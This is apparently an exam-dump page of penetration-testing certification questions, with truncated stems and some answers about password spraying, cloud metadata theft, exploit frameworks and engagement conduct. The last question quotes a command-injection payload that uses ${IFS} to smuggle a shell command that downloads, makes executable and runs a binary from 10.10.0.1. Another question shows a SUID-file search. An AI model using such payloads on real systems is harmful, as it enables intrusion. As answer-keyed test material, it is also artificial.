- All Exams Instant Download
Which of the following types of attacks would MOST likely be used to avoid account lockout?
During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?A ....
Which of the following vulnerabilities has the tester exploited?
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?A . Cross-site request forgery B....
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?A . Nessus B. Metasploit C. Burp Suite D. EthercapView AnswerAnswer: B
Which of the following snippets of output will the tester MOST likely receive?
A penetration tester performs the following command: curl CI Chttp2 https://www.comptia.org Which of the following snippets of output will the tester MOST likely receive? A . Option A B. Option B C. Option C D. Option DView AnswerAnswer: A Explanation: Reference: https://research.securitum.com/http-2-protocol-it-is-faster-but-is-it-also-safer/
Which of the following is the tester trying to accomplish?
A penetration tester runs the following command on a system: find / -user root Cperm -4000 Cprint 2>/dev/null Which of the following is the tester trying to accomplish?A . Set the SGID on all files in the / directory B. Find the /root directory on the system C. Find files...
Which of the following is the tester performing?
A penetration tester writes the following script: Which of the following is the tester performing?A . Searching for service vulnerabilities B. Trying to recover a lost bind shell C. Building a reverse shell listening on specified ports D. Scanning a network for specific open portsView AnswerAnswer: D Explanation: -z zero-I/O...
Which of the following is the MOST important action to take before starting this type of assessment?
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this...
Which of the following represents the BEST course of action for the penetration testers?
A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers?A . Redact identifying information and provide a previous customer's documentation. B. Allow the client to only view the information while in secure spaces. C....
Which of the following remediation techniques would be the BEST to recommend?
A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible. Which of the following remediation techniques would be the BEST to recommend? (Choose two.)A . Closing open services B. Encryption...
exploit += “/cgi-bin/index.cgi?
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = “POST ” exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a” exploit += “HTTP/1.1” Which of the following commands should the penetration tester run post-engagement?A ....
